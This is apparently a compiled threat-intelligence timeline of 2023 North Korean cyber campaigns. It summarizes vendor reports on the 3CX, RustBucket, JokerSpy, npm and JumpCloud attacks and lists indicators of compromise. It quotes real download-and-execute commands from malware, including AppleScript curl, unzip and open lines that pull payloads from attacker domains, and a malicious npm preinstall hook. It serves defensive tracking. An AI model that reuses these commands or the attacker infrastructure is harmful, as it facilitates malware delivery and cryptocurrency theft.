As we reviewed available reports on the 3CX attack, we began wondering if the compromise concluded with the infostealer or further implants followed. To answer that question, we decided to review the telemetry we had on the campaign. On one of the machines, we observed a DLL named guard64.dll, which was loaded into the infected 3CXDesktopApp.exe process. Interestingly enough, we opened an investigation into a case linked to that DLL on March 21, about a week before the supply chain attack was discovered. A DLL with that name was used in recent deployments of a backdoor that we dubbed Gopuram and had been tracking internally since 2020. Three years ago, we were investigating an infection of a cryptocurrency company located in Southeast Asia. During the investigation, we found that Gopuram coexisted on victim machines with AppleJeus, a backdoor attributed to the Korean-speaking threat actor Lazarus.
Over the years, we observed few victims compromised with Gopuram, but the number of infections began to increase in March 2023. As it turned out, the increase was directly related to the 3CX supply chain attack. We found out that the threat actor specifically targeted cryptocurrency companies, dropping the following files on infected machines:
The discovery of the new Gopuram infections allowed us to attribute the 3CX campaign to the Lazarus threat actor with medium to high confidence. Our attribution is based on the following facts:
While investigating an attack on a Southeast Asian cryptocurrency company in 2020, we found Gopuram coexisting on the same machine with the AppleJeus backdoor, which is attributed to Lazarus.
The Gopuram backdoor has been observed in attacks on cryptocurrency companies, which is aligned with the interests of the Lazarus threat actor.
While looking for additional implants that used the same loader shellcode as the 3CX implants, we discovered a sample on a multiscanner service (MD5: 933508a9832da1150fcfdbc1ca9bc84c) loading a payload that uses the wirexpro[.]com C2 server. The same server is listed as an IoC for an AppleJeus campaign by Malwarebytes. Indicators::

Google TAG: How we’re protecting users from government-backed attacks from North Korea

Date:: 2023-04-05 URL:: https://mandiant.com/resources/blog/apt43-north-korea-cybercrime-espionage https://blog.google/threat-analysis-group/how-were-protecting-users-from-government-backed-attacks-from-north-korea/ https://blog.virustotal.com/2023/04/apt43-investigation-into-north-korean.html Tags:: Details:: Indicators::

Inside the international sting operation to catch North Korean crypto hackers

Date:: 2023-04-11 URL:: https://cnn.com/2023/04/09/politics/north-korean-crypto-hackers-crackdown/index.html Tags:: Details:: Indicators::

Lazarus DeathNote campaign

Date:: 2023-04-12 URL:: https://securelist.com/the-lazarus-group-deathnote-campaign/109490/ Tags:: Operation DreamJob, Applejeus, DeathNote Details::

The Trojanized application utilized in the second stage is masquerading as a genuine UltraVNC viewer. If executed without any command line parameters, it will display a legitimate UltraVNC viewer window. However, it carries out a malicious routine when it is spawned with “-s {F9BK1K0A-KQ9B-2PVH-5YKV-IY2JLT37QQCJ}” parameters. The other infection method executes the installer, which creates and registers an injector and backdoor in a Windows service. Finally, the backdoor is injected into a legitimate process (svchost.exe) and initiates a command-and-control (C2) operation. In this infection, the final payload injected into the legitimate process was Manuscrypt. Until this discovery, the Lazarus group had primarily targeted the cryptocurrency business. Our investigation has identified potential compromises of individuals or companies involved in cryptocurrency in Cyprus, the United States, Taiwan and Hong Kong.
Finally, this Trojanized PDF viewer overwrites the original opened file with a decoy PDF file and opens it to deceive the victim while implementing the malware payload. The payload is executed with command line parameters, and a shortcut file is created in the Startup folder to ensure persistence. This infection mechanism demonstrates the care and precision with which the actor delivers the payload.
SumatraPDF, BLIDINGCAN, COPPERHEDGE, Mimikatz, SecurePDF, ForestTiger Indicators::

Linux malware strengthens links between Lazarus and the 3CX supply-chain attack

Date:: 2023-04-20 URL:: https://welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack/ https://reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ https://crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/ https://news.sophos.com/en-us/2023/03/29/3cx-dll-sideloading-attack/ https://blog.checkpoint.com/2023/03/29/3cxdesktop-app-trojanizes-in-a-supply-chain-attack-check-point-customers-remain-protected/ https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack https://trendmicro.com/fr_fr/research/23/c/information-on-attacks-involving-3cx-desktop-app.html https://x.com/patrickwardle/status/1641294247877021696 https://objective-see.org/blog/blog_0x73.html Tags:: 3CX, Applejeus Details::

ESET researchers have discovered a new Lazarus Operation DreamJob campaign targeting Linux users. Indicators::
journalide.org
journalide.org/djour.php
23.254.211.230 N/A Hostwinds LLC. BADCALL for Linux
38.108.185.79
38.108.185.115 od.lk Cogent Communications 2023-03-16 Remote OpenDrive storage containing SimplexTea (/d/NTJfMzg4MDE1NzJf/vxmedia)
172.93.201.88 journalide.org Nexeon Technologies, Inc. 2023-03-29 C&C server for SimplexTea (/djour.php)

Targetting macOS with ‘RustBucket’ Malware

Date:: 2023-04-21 URL:: https://jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/ https://securelist.com/bluenoroff-methods-bypass-motw/108383/ Tags:: BlueNoroff, RustBucket Details::

Jamf Threat Labs has discovered a macOS malware family that communicates with command and control (C2 servers to download and execute various payloads. This attribution is due to the similarities noted in a Kaspersky blog Indicators::

US DOJ: North Korean Foreign Trade Bank Representative Charged in Crypto Laundering Conspiracies

Date:: 2023-04-24 URL:: https://justice.gov/opa/pr/north-korean-foreign-trade-bank-representative-charged-crypto-laundering-conspiracies Tags:: Money Laundering Details::

Sim Hyon Sop + Wu Huihu Indicators::
1G3Qj4Y4trA8S64zHFsaD5GtiSwX19qwFv

USG: Half of North Korean missile program funded by cyberattacks and crypto theft

Date:: 2023-05-10 URL:: https://cnn.com/2023/05/10/politics/north-korean-missile-program-cyberattacks/index.html Tags:: Money Laundering Details::

It’s an estimate that suggests hacking and cybercrime are key to the North Korean regime’s survival. Neuberger’s comments come amid heightened international concern over Pyongyang’s missile and nuclear weapons program. A new intercontinental ballistic missile that North Korea tested in April could allow the regime to launch long-range nuclear strikes more quickly, CNN previously reported. Indicators::

Attack Trends Related to DangerousPassword

Date:: 2023-05-12 URL:: https://blogs.jpcert.or.jp/en/2023/05/dangerouspassword.html Tags:: DangerousPassword Details::

DangerousPassword, CryptoMimic, SnatchCrypto
Attacks by sending malicious CHM files from LinkedIn
Attacks using OneNote files
Attacks using virtual hard disk files
An AppleScript is contained, and it downloads an unauthorized application in main.scpt using the curl command and then executes it Indicators::
do shell script curl -o /users/shared/1.zip https://cloud.dnx.capital/ZyCws4dD_zE/aUhUJV@p6P/S9XrRH9%2B/R51g4b5Kjj/abnY%3D -A curl
do shell script unzip -o -d /users/shared /users/shared/1.zip
do shell script open /users/shared/Internal PDF Viewer.app\
cloud[.]dnx[.]capital

APT-C-28 (ScarCruft) Organization Uses Malicious Documents to Deliver RokRAT Attack Activity Analysis

Date:: 2023-05-19 URL:: https://mp.weixin.qq.com/s/RjvwKH6UBETzUVtXje_bIA Tags:: ScarCruft, ROKRAT Details::

APT-C-28, also known as ScarCruft, APT37 (Reaper), and Group123, is an overseas APT organization from Northeast Asia. Its related attack activities can be traced back to 2012 and are still active today. APT-C-28 mainly conducts cyber attacks against Asian countries such as South Korea, targeting multiple industries including chemicals, electronics, manufacturing, aerospace, automobiles, and healthcare, mainly to steal information and sensitive data related to strategic military, political, and economic interests. At the same time, RokRat is a cloud-based remote access tool that has been used by APT-C-28 in multiple attack activities since 2016.
APT-C-28 organization delivering RokRat malware to targets under the guise of malicious documents such as payment application forms. This attack activity is basically consistent with the process of the APT-C-28 organization using VBA self-decoding technology to inject RokRat attack activities disclosed in public threat intelligence in 2021 [1] . In this attack activity, the initial sample we found was a malicious document disguised as a payment application form that induced users to enable macros and then download and execute RokRat malware. However, combined with previous public threat intelligence information [2] , the initial payload of this attack activity should be a phishing email. Indicators::
api.onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBdTJteTF4aDZ0OFhkSUpseW14b21abFd2WW8_ZT15SjJTSkk/root/content

Phishing Attacks Targetting North Korea-Related Personnel

Date:: 2023-05-22 URL:: https://asec.ahnlab.com/en/52970/ Tags:: Kimsuky Details::

AhnLab Security Emergency response Center (ASEC) has recently discovered that the Kimsuky group had created a webmail website that looks identical to certain national policy research institutes. Earlier this year, ASEC had covered similar issues in the posts ‘Web Page Disguised as a Kakao[1]/Naver[2] Login Page’. The previous attacker set the fake login page with autocompleted IDs of trade, media, and North Korea-related individuals and organizations. In addition to that, the recently discovered web page used a similar tactic of having the ID of the target organization’s leader autocompleted in the recently created website. When the user attempts to login, the threat actor comes into possession of the internal webmail website account credentials. This data is deemed as useful as procuring the account information of the target user’s portal website account credentials. Indicators::
mailid[.]scabm[.]co[.]kr/account/login[.]do

US sanctions orgs behind North Korea’s ‘illicit’ IT worker army

Date:: 2023-05-23 URL:: https://bleepingcomputer.com/news/security/us-sanctions-orgs-behind-north-koreas-illicit-it-worker-army/ Tags:: DPRK-IT Details::

The Treasury Department's Office of Foreign Assets Control (OFAC) announced sanctions today against four entities and one individual for their involvement in illicit IT worker schemes and cyberattacks generating revenue to finance North Korea's weapons development programs. North Korea's illicit revenue generation strategy relies heavily on a massive army of thousands of IT workers who hide their identities to get hired by companies overseas, the OFAC said in a press release published on Tuesday. To secure employment with targeted companies, they employ various deceptive tactics, including using stolen identities, fake personas, and falsified or forged documentation. Indicators::

Bluenoroff’s RustBucket campaign (SnatchCrypto)

Date:: 2023-05-23 URL:: https://blog.sekoia.io/bluenoroffs-rustbucket-campaign Tags:: BlueNoroff, RustBucket Details::

The RustBucket infection chain consists of a macOS installer that installs a backdoored, yet functional, PDF reader. The fake PDF reader then requires opening a specific PDF file that operates as a key to trigger the malicious activity.
When opened in a classical PDF reader, the PDF document displays a message asking the user to open the document in the proper reader (i.e. the backdoored one). When opened in this reader, the PDF displays a nine pages document about a venture capital company that appears to be the printout of a legit company’s website. The fake PDF reader uses a hardcoded 100-bytes XOR key to decrypt the new content of the document and the C2 server configuration.
During our investigation on the macOS variant, Sekoia.io analysts identified a .NET version of RustBucket, with a similar GUI, developed using the library DevExpress.XtraPdfViewer. The malware was embedded in a ZIP archive containing the PDF reader and the key PDF requiring user interaction.
Bluenoroff’s observed initial intrusion vector includes phishing emails, as well as leveraging social networks such as LinkedIn. During our investigations, we identified the domain sarahbeery.docsend.me, further analysis led us to the following LinkedIn profile: Indicators::
104.156.149[.]130
104.168.138[.]7
104.168.167[.]88
104.168.174[.]80
104.234.147[.]28
104.255.172[.]56
104.255.172[.]52
149.248.52[.]31
149.28.247[.]34
152.89.247[.]87
155.138.159[.]45
155.138.219[.]140
172.86.121[.]130
172.86.121[.]143
172.93.181[.]221
cloud.dnx[.]capital
laos.hedgehogvc[.]us
safe.doc-share[.]cloud
DevExpress.Xpr.v19.2.dll
DevExpress.XtraList.v19.2.dll
PdfViewer.exe
PDF DOJ Report on Bizlato Investigation.pdf
PDF Jump Crypto Investment Agreement.pdf
PDF Readme.pdf
SCPT main.scpt
Internal PDF Viewer 2.app.zip
Internal PDF Viewer.app.zip
Pdf Viewer.zip
PdfViewer.zip
Jump Crypto Investment Agreement.zip

North Korea is now Mining Crypto to Launder Its Stolen Loot

Date:: 2023-05-23 URL:: https://web.archive.org/web/20230328150400/https://wired.com/story/north-korea-apt43-crypto-mining-laundering/ Tags:: Kimsuky, APT43 Details::

Today, cybersecurity firm Mandiant published a report on a prolific North Korean state-sponsored hacking group it's now calling APT43, sometimes known by the names Kimsuky and Thallium. The group, whose activities suggest its members work in the service of North Korea's Reconnaissance General Bureau spy agency, has been primarily focused on espionage, hacking think tanks, academics, and private industry from the US to Europe, South Korea, and Japan since at least 2018, mostly with phishing campaigns designed to harvest credentials from victims and plant malware on their machines.
Like many North Korean hacker groups, APT43 also maintains a sideline in profit-focused cybercrime, according to Mandiant, stealing any cryptocurrency that can enrich the North Korean regime or even just fund the hackers' own operations. And as regulators worldwide have tightened their grip on exchanges and laundering services that thieves and hackers use to cash out criminally tainted coins, APT43 appears to be trying out a new method to cash out the funds it steals while preventing them from being seized or frozen: It pays that stolen cryptocurrency into hashing services that allow anyone to rent time on computers used to mine cryptocurrency, harvesting newly mined coins that have no apparent ties to criminal activity. Indicators::

Kimsuky Strikes Again New Social Engineering Campaign Aims to Steal Credentials and Gather Strategic Intelligence

Date:: 2023-06-06 URL:: https://sentinelone.com/labs/kimsuky-new-social-engineering-campaign-aims-to-steal-credentials-and-gather-strategic-intelligence/ Tags:: Kimsuky Details::

Kimsuky conducted a social engineering campaign targeting experts in DPRK issues to steal Google and subscription credentials of a reputable news and analysis service focusing on the DPRK, as well as deliver reconnaissance malware. Kimsuky also engaged in extensive email correspondence and used spoofed URLs, websites imitating legitimate web platforms and Office documents weaponized with the ReconShark malware. The activity indicates Kimsuky’s growing dedication to social engineering and highlights the group’s increasing interest in gathering strategic intelligence. Indicators::

North Korea-Aligned TAG-71 Spoofs Financial Institutions in Asia and US

Date:: 2023-06-07 URL:: https://go.recordedfuture.com/hubfs/reports/cta-2023-0606.pdf Tags:: BlueNoroff Details::

We also confirmed that 2 previously identified IP addresses were still in use in this campaign:
155.138.159.45 and 104.255.172.56. 155.138.159.45, identified in a December 2022 Kaspersky report on Bluenoroff activity, overlaps with TAG71 activity. This IP address has been used by TAG71 from August 2022 to February 2023. 25 domains resolved to this IP address; these domains also had generic document sharing and protection themes.
104.255.172.56 was used by TAG71 from September 2022 until March 2023, and domains resolving to this IP address previously resolved to infrastructure associated with TAG71 in a September 2022 report published by Insikt Group to Recorded Future clients. While Insikt Group was unable to determine the nature of every domain, most of the domains in this cluster appear to be spoofing private equity firms in Japan, the United States, and Vietnam. The domains that were live at the time of analysis redirected visitors to the legitimate website they were spoofing.
Insikt Group found 2 ZIP files on 104.255.172.56. The ZIP files contained an encrypted PDF document alongside a double extension file called “Password.txt.lnk” used to trick the victim into clicking it in order to get the password for the encrypted PDF file, but it instead launches either “pcalua.exe” or “mshta.exe”, performing an indirect command execution technique Indicators::
cloud.dnx.capital
Arbor Ventures.pdf
safe[.]doc-share[.]cloud/Krj5vPCP/sCEN30a/xMODNxXBJW/q7bdEXiOvm/dwmvpgnZDI/pOkszug
172.93.181.221
Shotdown of Chipmixer(DOJ Report).docx
azure.doc-protect[.]cloud
104.168.143.222
documentuser[.]us[.]org/KGfITmyU69q/XJ%2BPcdHl/UnLq8DPVQx/VqOsW_wINO/5Lhr9DDETQ/zQ56w%3D%3D
SuspectedAddresses.docx
azure.doc-protect[.]cloud
104.168.143.222
documentuser[.]us[.]org/KGfITmyU69q/XJ%2BPcdHl/UnLq8DPVQx/VqOsW_wINO/5Lhr9DDETQ/zQ56w%3D%3D
DaiwaSecuritiesGroup.docx
cloud[.]daiwa[.]ventures
104.168.143.222
Password.txt.lnk
31VENTURESPresentation(Protected).docx

Report: North Korean Hackers Have Stolen $3 Billion Worth of Crypto

Date:: 2023-06-12 URL:: https://finance.yahoo.com/news/report-north-korean-hackers-stolen-034503145.html Tags:: Money Laundering Details::

Over the past five years, hackers backed by North Korea have successfully stolen approximately $3 billion in cryptocurrency by employing sophisticated tactics and posing as recruiters, IT workers, and government officials. These elaborate schemes have allowed them to gain access to sensitive information and exploit unsuspecting victims. Notably, the stolen cryptocurrency funds 50% of North Korea's ballistic missile program, as reported by The Wall Street Journal. Indicators::

Fragments of Cross-Platform Backdoor Hint at Larger Mac OS Attack

Date:: 2023-06-13 URL:: https://bitdefender.com/blog/labs/fragments-of-cross-platform-backdoor-hint-at-larger-mac-os-attack/ Tags:: JokerSpy, ROT13 Details::

During routine detection maintenance, our Mac researchers stumbled upon a small set of files with backdoor capabilities that seem to form part of a more complex malware toolkit. The following analysis is incomplete, as we are trying to identify the puzzle pieces that are still missing. Two of the three isolated samples are generic backdoors written in Python that seem to target Mac OS, Windows and Linux-based operating systems. Indicators::
git-hub[.]me/view.php

Initial research exposing JOKERSPY

Date:: 2023-06-20 URL:: https://elastic.co/security-labs/inital-research-of-jokerspy Tags:: JokerSpy, ROT13 Details::

An overview of JOKERSPY, discovered in June 2023, which deployed custom and open source macOS tools to exploit a cryptocurrency exchange located in Japan.
sh.py is a Python backdoor used to deploy and execute other post-exploitation capabilities like Swiftbelt .
While we are still investigating and continuing to gather information, we strongly believe that the initial access for this malware was a malicious or backdoored plugin or 3rd party dependency that provided the threat actor access. This aligns with the connection that was made by the researchers at Bitdefender who correlated the hardcoded domain found in a version of the sh.py backdoor to a Tweet about an infected macOS QR code reader which was found to have a malicious dependency. Indicators::
app.influmarket[.]org

Sophisticated Ongoing Attack on NPM

Date:: 2023-06-23 URL:: https://blog.phylum.io/sophisticated-ongoing-attack-discovered-on-npm/ https://blog.phylum.io/junes-sophisticated-npm-attack-attributed-to-north-korea/ Tags:: JumpCloud Details::

Two Packages Working Together: Attack chain is spread across a pair of packages and the order in which these packages need to be installed is important. This is because the first package will fetch a token from one of several potential remote servers and store it within a subdirectory of the user’s home directory, such as /.config/npmcache. Subsequently, the second package utilizes this token to acquire another script from the remote server. Given this workflow, it’s crucial that each package in a pair is executed sequentially, in the correct order, and on the same machine to ensure successful operation. Indicators::
chart-tablejs
sync-request
preinstall: npm install sync-request && node main.js
Stage 1 jpeg-metadata ~/.vscode/jsontoken npmrepos.com checkupdate.php
Stage 2 ttf-metadata ~/.vscode/jsontoken npmrepos.com getupdate.php
Stage 1 chart-tablejs ~/.cprice/pricetoken tradingprice.net checktoken.php
Stage 2 vuewjs ~/.cprice/pricetoken tradingprice.net getbprice.php
Stage 1 chart-vxe ~/.cprice/pricetoken tradingprice.net checktoken.php
Stage 2 vue-gws ~/.cprice/pricetoken tradingprice.net getbprice.php
Stage 1 elliptic-helper ~/.vscode/jsontoken npmcloudjs.com checkupdate.php
Stage 2 elliptic-parser ~/.vscode/jsontoken npmcloudjs.com getupdate.php
Stage 1 price-fetch ~/.cprice/pricetoken bi2price.com checktoken.php
Stage 2 price-record ~/.cprice/pricetoken bi2price.com getbprice.php
Stage 1 btc-web3 ~/.cprice/pricetoken bi2price.com checktoken.php
Stage 2 other-web3 ~/.cprice/pricetoken bi2price.com getbprice.php
Stage 1 assets-graph ~/.cprice/pricetoken bi2price.com checktoken.php
Stage 2 assets-table ~/.cprice/pricetoken bi2price.com getbprice.php
Stage 1 tslib-react ~/.vscode/jsontoken npmjsregister.com checkupdate.php
Stage 2 tslib-util ~/.vscode/jsontoken npmjsregister.com getupdate.php
Stage 1 audit-ejs ~/.npm/audit-cache npmjsregister.com auditcheck.php
Stage 2 audit-vue ~/.npm/audit-cache npmjsregister.com getcheckjs.php
Stage 1 ejs-audit ~/.npm/audit-cache npmjsregister.com auditcheck.php
Stage 2 vue-audit ~/.npm/audit-cache npmjsregister.com getcheckjs.php
Stage 1 cache-vue ~/.config/npmcache npmjsregister.com auditcheck.php
Stage 2 cache-react ~/.config/npmcache npmjsregister.com getcheckjs.php
Stage 1 sync-http-api ~/.config/npmcache npmjsregister.com auditcheck.php
Stage 2 sync-https-api ~/.config/npmcache npmjsregister.com getcheckjs.php
Stage 1 couchcache-audit ~/.audit/npmcache npmjsregister.com auditcheck.php
Stage 2 snykaudit-helper ~/.audit/npmcache npmjsregister.com getcheckjs.php
142.44.178[.]222
5.135.199[.]12
188.68.229[.]49
91.195.240[.]12
216.189.145[.]247

North Korea’s Cyber Strategy

Date:: 2023-06-23 URL:: https://recordedfuture.com/north-koreas-cyber-strategy https://go.recordedfuture.com/hubfs/reports/cta-nk-2023-0622.pdf Tags:: Details:: Indicators::

Silly mistakes and a new malware family

Date:: 2023-06-23 URL:: https://securelist.com/lazarus-andariel-mistakes-and-easyrat/110119/ https://blog.talosintelligence.com/lazarus-magicrat/ https://asec.ahnlab.com/en/34461/ Tags:: Andariel Details::

Andariel, YamaBot, MagicRat, NukeSped, DTrack, EarlyRat
Infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the C2 server
VBA code pings a server associated with the HolyGhost / Maui ransomware campaign Indicators::

JokerSpy Unknown Adversary Targeting Organizations with Multi-Stage macOS Malware

Date:: 2023-06-28 URL:: https://sentinelone.com/blog/jokerspy-unknown-adversary-targeting-organizations-with-multi-stage-macos-malware/ Tags:: JokerSpy, ROT13 Details::

In the intrusions seen to date, researchers identified two Python backdoors, shared.dat and sh.py. The former uses a simple rot13 string obfuscation technique.
The sh.py backdoor is also multi-platform and requires a separate configuration file stored at ~/Public/Safari/sar.dat, likely containing the C2 as well as other parameters. The C2 observed by Elastic in an attack on an unnamed Japanese cryptocurrency exchange was app.influmarket.org. Indicators::
45.76.238[.[53 -The Constant Company, LLC Dallas TX Vultr Holdings, LLC REMOTE_DESKTOP
45.77.123[.]18
www.git-hub[.]me
app.influmarket[.]org

How DPRK’s macOS RustBucket Seeks to Evade Analysis and Detection

Date:: 2023-07-05 URL:: https://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/ Tags:: BlueNoroff, RustBucket Details::

BlueNoroff
RustBucket is noteworthy for the range and type of anti-evasion and anti-analysis measures seen in various stages of the malware.
The attack begins with an Applet that masquerades as a PDF Viewer app. An Applet is simply a compiled AppleScript that is saved in a .app format. Unlike regular macOS applications, Applets typically lack a user interface and function merely as a convenient way for developers to distribute AppleScripts to users.
The threat actors chose not to save the script as run-only, which allows us to easily decompile the script with the built-on osadecompile tool (this is, effectively, what Apple’s GUI Script Editor runs in the background when viewing compiled scripts).
The script contains three do shell script commands, which serve to download and execute the next stage. In the variant described by JAMF, this was a barebones PDF viewer called Internal PDF Viewer. We will forgo the details here as researchers have previously described this in detail.
We have found a number of different Stage 2 payloads, some written in Swift, some in Objective-C, and both compiled for Intel and Apple silicon architectures (see IoCs at the end of the post). The sizes and code artifacts of the Stage 2 samples vary. The universal ‘fat’ binaries vary between 160Kb and 210Kb.
Both variants are Mach-O universal binaries compiled from Rust source code. Variant A is considerably larger than B, with the universal binary of the former weighing in at 11.84MB versus 8.12MB for variant B. The slimmed-down newer variant imports far fewer crates and makes less use of the sysinfo crate found in both. Notably, variant B does away with the webT class seen in variant A for gathering environmental information and checking for execution in a virtual machine via querying the SPHardwareDataType value of system_profiler.
Importantly, variant B contains a persistence mechanism that was not present in the earlier versions of RustBucket. This takes the form of a hardcoded LaunchAgent, which is written to disk at ~/Library/LaunchAgents/com.apple.systemupdate.plist. The ErrorCheck file also writes a copy of itself to ~/Library/Metadata/System Update and serves as the target executable of the LaunchAgent. Indicators::
/Users/carey/
/Users/eric/
/Users/henrypatel/
/Users/hero/
DOJ Report on Bizlato Investigation.pdf
InvestmentStrategy(Protected).pdf
Jump Crypto Investment Agreement.pdf
DOJ Report on Bizlato Investigation_asistant.pdf
Daiwa Ventures.pdf
cloud.dnx[.]capital
crypto.hondchain[.]com

Flori Ventures Detected

Date:: 2023-07-08 URL:: https://x.com/TLP_R3D/status/1677617586349981696 Tags:: Bluenoroff, TA444 Details::

Fresh activity from TA444 noted! New trails found around the #FloriVentures theme Indicators::
192.119.64[.]43
floriventuresfinance.linkpc[.]net
floriventuresfund.linkpc[.]net
floriventurescapital.linkpc[.]net

Possible #Bluenoroff #TA444 #APT38 activity

Date:: 2023-07-10 URL:: https://x.com/KSeznec/status/1678319188140539904 Tags:: Bluenoroff, TA444 Details::

Possible #Bluenoroff #TA444 #APT38 activity Indicators::
142.11.209[.]131
142.11.209[.]144
192.119.64[.]43
23.254.129[.]6
23.254.167[.]226
23.254.167[.]227
23.254.204[.]173
association.linkpc[.]net
c-money.linkpc[.]net
decentryk[.]online
dma.linkpc[.]net
docsend-cloud.espcap[.]fun
docsend.com-proapple[.]cloud.line[.]pm
floriventurescapital.linkpc[.]net
floriventuresfinance.linkpc[.]net
floriventuresfund.linkpc[.]net
longjourneycapital.publicvm[.]com
longjourneyfund.publicvm[.]com
longjourneyventure.publicvm[.]com
protectsh[.]online
raizerverify[.]online
world.linkpc[.]net

The DPRK strikes using a new variant of RUSTBUCKET

Date:: 2023-07-13 URL:: https://elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket Tags:: BlueNoroff, DangerousPassword, SquidSquad, RustBucket Details::

RustBucket, Bluenoroff, DangerousPassword
do shell script curl -o /users/shared/Potential Risks of Cryptocurrency Assets.pdf\ https://crypto.hondchain.com/OuhVX8sdV21/HBKPHFlbyt/9zkMp5L5HS/fP7saoS3GZ/7fVinrx -A cur1-agent Indicators::
104.168.167[.]88
crypto.hondchain[.]com
starbucls[.]xyz
jaicvc[.]com
docsend.linkpc.net (dynamic DNS domain)

Github: Security alert: social engineering campaign targets technology industry employees

Date:: 2023-07-18 URL:: https://github.blog/security/vulnerability-research/security-alert-social-engineering-campaign-targets-technology-industry-employees/ Tags:: Details::

Jade Sleet impersonates a developer or recruiter by creating one or more fake persona accounts on GitHub and other social media providers. Thus far, we have identified fake personas that operated on LinkedIn, Slack, and Telegram. Indicators::
bi2price[.]com
coingeckoprice[.]com
cryptopriceoffer[.]com
npmaudit[.]com
npmjscloud[.]com
npmjsregister[.]com
npmrepos[.]com
tradingprice[.]net
npm packages:: assets-graph assets-table audit-ejs audit-vue binance-prices coingecko-prices btc-web3 cache-react cache-vue chart-tablejs chart-vxe couchcache-audit ejs-audit elliptic-helper elliptic-parser eth-api-node jpeg-metadata other-web3 price-fetch price-record snykaudit-helper sync-http-api sync-https-api tslib-react tslib-util ttf-metadata vue-audit vue-gws vuewjs
gitHub accounts:: GalaxyStarTeam Cryptowares Cryptoinnowise netgolden
npm accounts:: charlestom2023 eflodzumibreathbn galaxystardev garik.khasmatulin.76 hydsapprokoennl leimudkegoraie3 leshakov-mikhail linglidekili9g mashulya.bakhromkina mayvilkushiot outmentsurehauw3 paupadanberk pormokaiprevdz podomarev.goga teticseidiff51 toimanswotsuphous ufbejishisol

DangerousPassword attacks targeting developers’ Windows, macOS, and Linux environments

Date:: 2023-07-19 URL:: https://blogs.jpcert.or.jp/en/2023/07/dangerouspassword_dev.html Tags:: DangerousPassword, ROT13 Details::

At the end of May 2023, JPCERT/CC confirmed an attack targeting developers of cryptocurrency exchange businesses, and it is considered to be related to the targeted attack group DangerousPassword [1], [2] (a.k.a. CryptoMimic or SnatchCrypto), which has been continuously attacking since June 2019. This attack targeted Windows, macOS, and Linux environments with Python and Node.js installed on the machine. This article explains the attack that JPCERT/CC has confirmed and the malware used.
Python malware is simple downloader-type malware that downloads and executes MSI files from an external source. As shown in Figure 2, it is characterized by its extensive use of ROT13 to obfuscate C2 strings and other strings used. Indicators::
app.developcore[.]org
pkginstall[.]net
www.git-hub[.]me
checkdevinc[.]com

JumpCloud: Attacker Infrastructure Links Compromise to North Korean APT Activity

Date:: 2023-07-20 URL:: https://sentinelone.com/labs/jumpcloud-intrusion-attacker-infrastructure-links-compromise-to-north-korean-apt-activity/ https://jumpcloud.com/support/july-2023-iocs Tags:: JumpCloud Details::

While the following is not a strong indicator of attribution alone, it’s noteworthy that specific patterns in how the domains are constructed and used follow a similar pattern to other DPRK linked campaigns we track. Indicators with suspected actor association, but unverified as of this writing, include junknomad[.]com and insatageram[.]com (registered with jeanettar671belden[@]protonmail[.]com).
Additional pivots of potential interest can be made through other IPs, including 167.114.188[.]40, and to a variety of low confidence attacker-associated infrastructure.
Following the profile of the associated infrastructure from both the JumpCloud intrusion and the GitHub security alert, we can expand to further associated threat activity. For example, we can see clear links to other NPM and “package” themed infrastructure we associate with high to medium confidence, as noted in the list below. This list further expands thanks to the findings and blog from Phylum in late June. Indicators::
alwaysckain.com
canolagroove.com
centos-pkg.org
centos-repos.org
datadog-cloud.com
datadog-graph.com
launchruse.com
nomadpkg.com
nomadpkgs.com
npm-pool.org
npmaudit.com
primerosauxiliosperu.com
reggedrobin.com
skylerhaupt.com
toyourownbeat.com
zscaler-api.org
junknomad.com
insatageram.com
jeanettar671belden@protonmail.com
100.21.104.112
104.223.86.8
116.202.251.38
144.217.92.197
162.19.3.23
162.241.248.14
167.114.188.40
179.43.151.196
185.152.67.39
192.185.5.189
23.29.115.171
23.95.182.5
45.82.250.186
51.254.24.19
66.187.75.186
70.39.103.3
78.141.223.50
89.44.9.202
91.234.199.179

Mandiant: North Korea Leverages SaaS Provider in a Targeted Supply Chain Attack (JumpCloud)

Date:: 2023-07-24 URL:: https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain/ Tags:: TraderTraitor Details::

UNC4899, TraderTraitor, ExpressVPN, JumpCloud, Trading Technologies, X_TRADER, 3CX Indicators::
175[.]45[.]178[.]0/24 (Ryugyong Dong)
146[.]19[.]173[.]125
23[.]227[.]202[.]54
38[.]132[.]124[.]88
88[.]119[.]174[.]148
198[.]244[.]135[.]250
contortonset[.]com
relysudden[.]com
primerosauxiliosperu[.]com
rentedpushy[.]com
basketsalute[.]com
prontoposer[.]com

DPRK Sanctions Timeline

Date:: 2023-07-24 URL:: https://nkhumanitarian.wordpress.com/dprk-sanctions-timeline/ Tags:: Details::

It describes the first generation as consisting of the so-called smart sanctions targeting the military and the elite, based on resolutions 1718 (2006), 1874 (2009), 2087 (2013), 2094 (2013), and 2270 (2016).
But after the September 9, 2016, detonation of the DPRK’s most powerful nuclear weapon at the time, the nature of UN sanctions against the DPRK changed, the reports notes. It gave rise to the second generation ‘sectoral’ sanctions targeting entire spans of the North Korean economy, based on resolutions 2321 (2016), 2371 (2017), 2375 (2017), and 2397 (2017).
The first generation sanctions had mostly lengthened the list of embargoed arms and the list of dual-use goods and technology. Each new resolution of that generation also added more entities and officials connected with the DPRK who are targeted with financial sanctions and travel bans. They also targeted the elite by banning the import of ‘luxury goods’, an ill-defined category of items whose sanctioning has been comprehensively and demonstrably evaded.
The Human Costs report observes that “these [first generation] sanctions may affect the non-elite population, as the military ban includes items, materials, and technologies that could be used for either military or civilian purposes (‘dual-use’), and the DPRK has been progressively cut off from international capital.”
